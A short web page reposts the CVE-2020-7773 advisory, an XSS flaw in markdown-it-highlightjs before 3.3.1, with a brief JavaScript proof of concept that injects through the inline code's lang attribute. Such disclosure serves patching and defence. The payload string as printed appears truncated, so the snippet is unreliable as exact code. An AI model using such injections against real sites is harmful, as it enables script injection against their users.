CVE-2020-7773

CVE-2020-7773

This affects the package markdown-it-highlightjs before 3.3.1.
It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature.

const markdownItHighlightjs = require("markdown-it-highlightjs");
const md = require(‘markdown-it’);

const reuslt_xss = md()
.use(markdownItHighlightjs, { inline: true })
.render(‘console.log(42){.">js}’);

console.log(reuslt_xss);

Source: CVE-2020-7773

댓글 남기기

이메일은 공개되지 않습니다. 필수 입력창은 * 로 표시되어 있습니다

Time limit is exhausted. Please reload the CAPTCHA.